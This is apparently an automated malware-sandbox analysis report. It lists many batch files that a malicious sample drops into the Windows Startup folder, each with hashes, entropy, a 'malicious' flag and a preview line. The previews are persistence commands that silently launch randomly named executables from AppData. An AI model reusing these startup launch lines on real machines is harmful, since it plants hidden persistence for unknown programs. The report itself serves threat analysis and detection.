                                                                                                                          SHA1:6CC017AE0D79B9F6D81B4CE2D000D0E0CCB714BD
                                                                                                                          SHA-256:4FD461B67E3FA147C7236B371DE971104CE1317C451903FC7622E2B8837A12B5
                                                                                                                          SHA-512:578D0A956F3F2875FCA70CB4A5C98104936B3BB111890BEEEEF656D24C37088CDFD02E4D9486EA23A47CB2914DDAD8BD56EEE870062921146D08B4AF426540A7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\zWNPblMz8jR3viBabeOSPbWa.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JqwWbmZjvUESTxkLyujvgfQ5.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.943658467520809
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5BwFOQ6Mmln:fE1923npMi
                                                                                                                          MD5:51301864BA3657104ABC8FF2E52D721F
                                                                                                                          SHA1:4183381B58BD942D5AA12F3C274BAB18032DEC91
                                                                                                                          SHA-256:09B7D4F78F815B0F5DEB5FECBBA0F183D903BECC334E20E9DA59C7B5FEDD00BB
                                                                                                                          SHA-512:81B0212DD1C4CC59C8567FE039CCB6D584E598F5B862B68BD2DAE3FEE7DF33EA2975E641795C6825F762308A0C2DEA44BDD9471675E4DB4D0775F0CB2B46173A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\dUxbeTroGHi03yY2SNfS5bOl.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JvJ8FkMpNTNcNAQ5IZH9OyrC.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.91508703894938
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5vdpT4nUJgIpm4mn:fE1923FpPJgUc
                                                                                                                          MD5:C02835051B4210F6F278684942DF8E68
                                                                                                                          SHA1:6725CD07B0C2DF86F428BC2CCF183CC89C4D8291
                                                                                                                          SHA-256:32C8A8DB2848D379D29ABD5DB5F15DFA88BFF54FE4BD58831970CE7DB466253A
                                                                                                                          SHA-512:E0005F47CAD9DF2414E612E565B41A51F602F9EFDE21F6FB0E4C08726D7DA9E06CFE0613BAA5B267DFB7EA91D13DCE0E5603EBF8F39386D596E0ABCAE58C83D0
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\J8LomUCEiQeMvIGqlnqM0LZ5.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KCLvXEQADdAafKsEPtvKcJuW.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.845135653917384
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Ew0SoAdX/NEJPneF:fE1923EwLddl+neF
                                                                                                                          MD5:E24510AE71186B8B408F44940A7A28AF
                                                                                                                          SHA1:991A2BD09358AA5FB069458687701C6EAE7BECE8
                                                                                                                          SHA-256:C9F2A4F471CED174823E334C08F5B0A39CDB70A14F8BD54FE3025C5246D0D507
                                                                                                                          SHA-512:9762F304C55A4782279938CAB7413C4C4C950EDB6010FADC5543ED4F7CFF7C3FD804F371312D18D8C1F7FFE3C1D7DB558C6CDEA7102ED0BB84268312C9E5A447
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\aUwbp4hWfsJe82ZKgal8jxB3.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5wb8yM8aV9uA3MWk0nQDV6N.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.983014003266001
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5OX3RQcmcijUBAdiF:fE1923OHRjmcioBAdm
                                                                                                                          MD5:436C213EC74B0B1FC8C7A0861F877119
                                                                                                                          SHA1:761CA98CC773DB86F2757F0742D516BA6BA59432
                                                                                                                          SHA-256:A19F9DA67EDEFE2060EFE84182E9A37A99132FA371EBB055897AE835E2E1FE62
                                                                                                                          SHA-512:7719695B765DBB853695E104291835EF0F766BE138D990FB1E61E3B14851EB36A3111D1B80B5873E29CA786540AF0F2D51AEDCEC232AB9369D1DC53F9238E2FE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LzSfFK21XHlma9f2nC93iWKZ.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.0638376026574035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dCtZTp3pTQDcCSkdan:fE1923ileAD
                                                                                                                          MD5:165E6C4684A6B25DE3BCB621CE0303B9
                                                                                                                          SHA1:56A05A322C23585760E97382F9D0BE5FEA0E8EDD
                                                                                                                          SHA-256:44F6B4D0E4E5B6370D0423FE3DC0099713EC34EEDA459E13942D35F2ADB068C7
                                                                                                                          SHA-512:26AC3CE0289AFB12FD042D9238BB7B27BD4E10200E0D7F51F2DD23F708E04BFD6D7639C4D41A62940D060AFF95EA49BC2BE7DEC781FB7FEA3FC6909F724DC509
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaVgvfbmcMYFauF5SMIvBy7w.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.925273374980767
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5K/lcdu6gU9:fE1923K/lcQ69
                                                                                                                          MD5:B7A2F9421E22EACCCBC05C6858197FFC
                                                                                                                          SHA1:71FC366976849F0ECB4840E537CB844213F47E91
                                                                                                                          SHA-256:682F0862E8C77C8B5CA5D839B8BB7BB5A54673BB8BDDAE0D20E4F29D30D653BF
                                                                                                                          SHA-512:D65F547F8FB8DDDC2958631754B6A1C3A0B0D9A754D696C491BAAF2A311264BFEF47F05BFBE834B71CA86D3B5C5E6C149B91F189D31625F00DB7D6D422750081
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\oV6dHd8Uj8abAaMmxW4y29GG.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoodA9bUbe1XXFqshkJJ2aMi.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.875731503204189
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Xd5GfWgh8dm:fE1923N5Gu4
                                                                                                                          MD5:48F51B916A9F4D9D7F5C1BBF03B95506
                                                                                                                          SHA1:D8B0568923C149DA31DE90A79B77D2BF9911F82D
                                                                                                                          SHA-256:7C9BADE2D91F28283C51C12852FAEE8C36EDCF8F4957640E1696D376A465B523
                                                                                                                          SHA-512:59E609C9BAAFD943337DDD62780DAEB7E152B025B0ECEEDF2D9A4A2792BE1CADBCC4F2557EA8D92B0148890C2479F3E7D1B9187B0A3142680A5F1CA30D981D4F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\r8s8W6BwO9zs4dtTCMpyOk6D.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NRkNthlWHWKfvzr3Huo2Hk96.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5wNVkvOlrhx8UTq4iF:fE1923wNAaxFO4iF
                                                                                                                          MD5:124A2C9E31A3687F77AFE112D8D494B5
                                                                                                                          SHA1:2E2E231F4131FA8253F822AFA32A2AE29A4EC80E
                                                                                                                          SHA-256:545882AD57CA434F0F90471F890E9C7DB057A12224DE4C10C308D2F82DA7204D
                                                                                                                          SHA-512:CBB5D238D85A5545595699989ECF3BB6A184B099A9858B883F791C914155777D3CD0166CB461BA897C465D0177C4D2CBE526C3A1A30A924F546AFB6F75248720
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\UyY0AJkHrNf9ELHT0hUQo1vI.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NqyzZEihnfaWqCPw2h2kjWPD.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.988590567916905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J50+achln:fE19230ahl
                                                                                                                          MD5:CAE43F37D81F02246CECF4ADBCAC36E1
                                                                                                                          SHA1:84521B94F881EE1988DF13FD48AB08D56585DB5C
                                                                                                                          SHA-256:373647CF8E0E0501BE8B376A4D3F8C7B888EDC36E1018C1D813A19460379F17B
                                                                                                                          SHA-512:80D3D56572C76E9052942E368146722C9184B936F9C0AC9313950D9798AACB4D48B5021251C0FE24CBF00FC7E31B04B2E8E24E2B55EA037F44E54C24BBA829D7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Q54LGmnZmhktpXP3y7EOrtRY.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nsezr6XoeqytkgoUxSHdidst.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.866374045603423
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5iCOVkZ3diiIKNFn:fE1923iCOQEKX
                                                                                                                          MD5:116990468FF0D8D4E8D40FD277015A15
                                                                                                                          SHA1:30EC7D6377A18070D2D26904A06B454E861DF4AF
                                                                                                                          SHA-256:3D1F072865516136665F6E0E4A50E68C3F78AD9EB21E53B16FB2D3E560E8202C
                                                                                                                          SHA-512:43DFA735CCED10025B0AE50122992C79E9FD49069E640C28258AED3E6A6E846FECB9BE16DB8553F4EA3EF4884FAB3AD2BE73897D8CFFE966C86774582B62B905
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\GgkHyxCAI1v6YgxGdG6aBohl.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYIEdBWtHabBbSeILpT9tflf.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9328743603470455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5IrMyIt4SSkcF4mn:fE1923InPl
                                                                                                                          MD5:0E43E764A951916B288184A7A3CB5C2B
                                                                                                                          SHA1:A6CDA1538D4A3C89021C5E291179B4E463BF376D
                                                                                                                          SHA-256:14DCEDC188CF35B7BC2CA61223E1F140FB7553186C3D7C6C405803D92B637715
                                                                                                                          SHA-512:EB606F9275AD25570C4C9760C89AA1C798354B1EF3BA0525FB45FB55C2BE4200990D7FCD2BF5656DBBB48F9C9A377882BAA753CE9D76F94897233E502D69E9DE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\mNie156DZkBHGFa0A77A9lus.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.018588646061332
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5/1Cj6w/PudAln:fE1923t2b
                                                                                                                          MD5:A52E10C3F69141A3B40ADE046072BDB4
                                                                                                                          SHA1:AA9E231EF67B4D96143874D9C72FFEC28E81C1DB
                                                                                                                          SHA-256:02A4E9D38E25AD246F07F02A2B23EAD1073174863C5A502D593BB3894A7D938A
                                                                                                                          SHA-512:99131145951832E8CD2EDF07455212730ED01EE2526768C49FC823DBA43D7A8F4FC8DB825AFE7B2EDF6D3F100004D926B31D84A92C2EEAB000222649B31F405F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\ZSwgvRB1MVwrU7ijKh97GNss.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqYgLbwNH1rp6de2WyF5QSu3.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QYS4H3boGiwdnoLAEFn:fE1923QYzc7PJF
                                                                                                                          MD5:F676443E653960132E9CEB51549265AD
                                                                                                                          SHA1:CD2444256027A2CB1C130A0C7DBBE25C3893DDDE
                                                                                                                          SHA-256:8989FC069C1342B23AC32157DA55C8049BC328E9BFED5D8929F6D9A0FFC31A4A
                                                                                                                          SHA-512:58FC6005400C6DE2B947B74A2151EFE0C40798ED1E7EBD81146EF9377517E484DDC8E1538B301AD5F199A7FAAAF1543A04277B3F370ED90A6BFA28B83A7BD38D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\57dlvwjpouwRqgMcxEUyyJBM.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Oqdv9aQZnmchlZhQPGADj1vm.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.886515610377953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5mKqMp59a2OH4AHF:fE1923mKqaja204m
                                                                                                                          MD5:5E3A6D8A2CC42CCE719418B13AEB6185
                                                                                                                          SHA1:ED726D7586312695975137B54D590FB9E65A1C33
                                                                                                                          SHA-256:C5E4802C6D132CA3EEF4EB68C31A452E144F8718D517F8F7CFC652CA7451C94B
                                                                                                                          SHA-512:6C216125AD129F05F94B4AB4E8053336FA8FC46D868C862CC864FB4220E41CE5979FCF92BB74EDD009BA4C44E003DD8C10AC29DF9A8D29B070DC6EC7F02B06A4
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\CoOFUlBTAxdcXlCbNuzkOL16.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OtXKtregFQf6WT1poKNUeJKH.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.800801324663667
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5XQXvGH2kOuV9sn:fE1923W8Vu
                                                                                                                          MD5:A46AE994277342C375BED6580A1DCCC0
                                                                                                                          SHA1:58AD3A13B70839813059566077D9C589F910D51C
                                                                                                                          SHA-256:4772E2DC22D2C6E8261237B6763C67CAAFA98EC7925144DF75A961A421A6A0FC
                                                                                                                          SHA-512:09773AE7CB307B9B4130F9EF7F6A9CFAD8C26B94BD66167EBE22A83FE22906432BF9AA59F4EBE651A0E53F3665708FDA8B40462580C6954C600073D141ABA518
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\r5rrZo2uJpDKzb6r7Ao0yzpg.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QDBulKT4KjP0Dmav2rPCTbex.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.938450924997948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5WfdI8K9tDLs0dAHF:fE1923W1XstDo0dm
                                                                                                                          MD5:9D24B7323D346D8BF737F15E3F40F4E7
                                                                                                                          SHA1:0228287220F75D8F562E195A2B4D9AE8A8DD95CC
                                                                                                                          SHA-256:2C35E82F3ECE25A93D78C2F987AFD84583C29FEC63BD1CA8C2D89F40B1399DAD
                                                                                                                          SHA-512:7AAE6C0A535767EB4CE821C4E7A8C17F4E12206E98B01581A166A0919515E33CAD5C67F0CC4691A62AA48DBA7389AB01AA4842DF8F701C210742C6F219CA028C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\szxnVM7joyiHfYU34zqEUXkf.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Raxl5XZrmvvadNCoiM9FLM1Y.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.891723152900813
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5tzds9FSN3Ro:fE1923BkFSN3Ro
                                                                                                                          MD5:07687FD91A7ABE43B9812771D4BE295E
                                                                                                                          SHA1:BDCBA0EA1B856C4836913710AABC10B8F461512F
                                                                                                                          SHA-256:4CB3E66C2E838CE55A10F01B23FEE31C28E20059689C79F29F06C10CBDC50AC1
                                                                                                                          SHA-512:CCE9289B02611285D0F55D2ED6056D52B41ADD87D714061EBC24E404011F87315952747E47E2DBCB3FAF0AAFE9AFDB026F19CD9F9AAF3ACD34125B28A2659A1C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8rXbw1cOVjTK1xkd0JIGo0q.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.063200003864618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5cxJ13SV4yykdan:fE1923cxJg4yyD
                                                                                                                          MD5:6C444187B3EB0517AA0F9F97441205DF
                                                                                                                          SHA1:63E264B0DE2477AD52F4518291D16E079B2EFCB6
                                                                                                                          SHA-256:7ADBDCE54AA2A629ECF21B0E046493D9DDBB378B0FE18C4891C257A511A030DE
                                                                                                                          SHA-512:4A8C541463FC12FEA45AB12E90D752ADF11CE2B25B5345123D7CE6ADFEACDDC05DA5F897B521823FE2C2B6875528155A8F1665FB95756ABE13879A2EA8CE7CA9
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\9mAmsWjPEPtkITVqz02hZgXo.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SQOPRbGOQslr1pMs9iyrT8Qb.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9258711461231455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5kpJRlxMVtqyRwLVF:fE1923knRcf+VF
                                                                                                                          MD5:487651BD2C6286F17126D87449BFC960
                                                                                                                          SHA1:8502273AB76B18B535856F544B7F58530C9D5B1F
                                                                                                                          SHA-256:D35ED51809F2F1992548DB8F5F9276FE3BD6CF61D9016DE4F162894445BA3003
                                                                                                                          SHA-512:62895FAB84FE8F2C2E2E0C60A2640B732A45680952A64137EA728A1822AB40B3D62155F8C28DE535371AC46C8645C55BFB3AE0415FE7FBF6B0F3D39C4B180F45
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\ALltRFSkkUvPiwDCHOWNnJTU.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SfjQUmStVGetNiV041PzaRXb.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.022369539011194
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5UQkYTn:fE1923UK
                                                                                                                          MD5:C2E2D04CF100A2363B53166ADD7AF9C4
                                                                                                                          SHA1:3CDF9506940E5E5EB0B51F80777007FC8D9DBC29
                                                                                                                          SHA-256:838EE71F44D4B8D86B5EC3E37E3111325C5BF846A37339CF83657D17335F8697
                                                                                                                          SHA-512:2913655B2FAFD211AA492909CEAE86C11154A48E7EAE44024CDE4786CF52F8944D14BE512D08A10FB2E742CFBFC0B347B984F8B8BEDD9F42785C5ED098A29CB6
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\134QwGZJHw0tmuZYxwi52Diq.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T3nGwYe0ke53Bm81uF54Won2.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.807804538887568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Akyva0EF:fE1923AkyvaL
                                                                                                                          MD5:8A8E06E098735B6CBCB1FA2B29B5FD97
                                                                                                                          SHA1:49E04B916DEA2D49494A27F4B161DD337D443E15
                                                                                                                          SHA-256:5002C3E3219E3FB55805D1E316793CCCFFE9E830D28341123BB13CC924F5C36E
                                                                                                                          SHA-512:D6DE2AB7F9BD91A6EF242F79EC575697FE271C1449186E6BE4DAD60DA3C2B86C9D11636895A9C996BCF3820197897F658CD34DA1C384CD017F0A2B96E0FA52B5
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\e2LzwnlrYlvQTlkymiNs4ls8.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V2Ua9TLWP47cusgrbbxD2ie8.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.886515610377953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5I8vP2sgh8Fv:fE1923II1l
                                                                                                                          MD5:6F97505B94A3D0072E771D7DB3CB4E82
                                                                                                                          SHA1:7A8FB4906357C6FCD348A4471E6274E684060014
                                                                                                                          SHA-256:2D7A94EE232AD6B423A5C483AEEFFB1E11223568322FDEAAF7D57C2489CDE85B
                                                                                                                          SHA-512:5EABEEF2AB8F305779D1B3E1E4AB007B4E7A720B6595771E5677BE6E10D73E5B499DA5BE93E5093EC7508A23115508D2370475E2ACAB046E2C54165DB8D4D60F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\meewdacxdZVSIEbNRUL5vYdZ.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V38rH4DyBbWszXs0VbJ310hH.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.77080324651924
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5OHZhEINLAs:fE1923O/EsLAs
                                                                                                                          MD5:6F39635B7E4CA780A4B15F5D90C2D371
                                                                                                                          SHA1:5FC83CFB98A9BC23097DBA772DA21F56E9138666
                                                                                                                          SHA-256:A58976465D8F25BC2FD6C54DEC76669232D3FA507434070BC053E1B5D1AA255D
                                                                                                                          SHA-512:305EFC4F2682F2E369BC1EC3CEB63822D6B0B541E5EFCBFA771A22EB08F7BA858F1F59445D83EEF2CB7A9A3C2E7DAD2BDEF0CCC9615CB424FE413F325B0828AC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V4vz7ooYcwTTy9p6mMfXbhaV.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.864947396030424
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dTbGap0s:fE1923RbGaas
                                                                                                                          MD5:D523F761AD3BB415A4268AF478B665C3
                                                                                                                          SHA1:8BBF30C26C9FBC4CB5889D69178856ECA10FC5D5
                                                                                                                          SHA-256:11D7FBF80BF685FFF52C4789D578A059B7F76FEA1616B55DDEA3EE846A0A601F
                                                                                                                          SHA-512:E6B20A05FA72CABF7F3DBA23C239DE76E9555A66BD5406EFDCDDFC209B3965F3F525665B0CCDDBA7A8242501903A200F3955B5366A40A61E16A0043223B9C51A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VA3T9NrhhZhF4wDb6Z4wF5ik.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
